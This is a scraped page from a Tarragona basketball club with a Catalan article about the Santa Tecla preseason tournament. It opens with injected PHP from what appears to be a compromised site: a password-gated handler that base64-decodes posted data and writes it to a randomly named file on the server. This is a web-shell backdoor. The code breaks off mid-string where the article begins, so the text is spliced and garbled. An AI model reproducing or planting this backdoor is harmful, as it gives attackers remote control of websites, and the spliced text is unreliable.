function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'últim gran examen abans de la competició - Tgn Bàsquet Club -

L’últim gran examen abans de la competició

By
Updated: setembre 12, 2013

Demà arrenca la cinquena edició del Torneig de Santa Tecla que organitza el TGN Bàsquet Club. Es tracta d’un campionat de pretemporada que permet els equips fer les darreres provatures abans de l’inici del campionat de lliga el cap de setmana del 21 i 22 de setembre pel que fa al buc insígnia del club, el Nemser TGN Bàsquet, i el 28 i 29 del mateix mes per la resta d’equips. El Torneig, dins el programa de les Festes de Santa Tecla de la ciutat de Tarragona va nèixer originàriament com a un campionat exclusivament femení en categoria sènior però degut a la massificació de les 12 Hores de bàsquet que l’entitat lila organitza el mes de juny de cada any es va haver d’ampliar als equips cadets i júniors no tan sols femenins, sinó fins i tot masculins. “Estaven desbordats i per això fa l’any passat vam decidir deixar les 12 Hores pels equips més petits i aprofitar el Torneig de Santa Tecla per donar cabuda als més grans, com a part de la seva preparació” diu Iñaki Liarte, vicepresident del TGN Bàsquet. A diferència de les 12 Hores, el Torneig de Santa Tecla té un caire més competitiu tot i ser en pretemporada, tal i com afirma Liarte: “En aquestes dates tots els equips busquen partits per trobar el nivell òptim de joc i és per això que ja permet veure com seran els futurs conjunts de cada club durant la temporada”.

En categoria sènior cal destacar l’absència del conjunt navarrès del Burlada en categoria sènior que havia assistit en tres de les quatre edicions disputades fins el moment i que no hi serà perquè la federació navarresa va decidir canviar a última hora les dates de la disputa de la copa de Navarra, fent-la coincidir amb el Torneig tarragoní. Així, el Nemser disputarà els seus dos partits contra el mateix rival, el Vilassar.

 

HORARIS TORNEIG SANTA TECLA

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *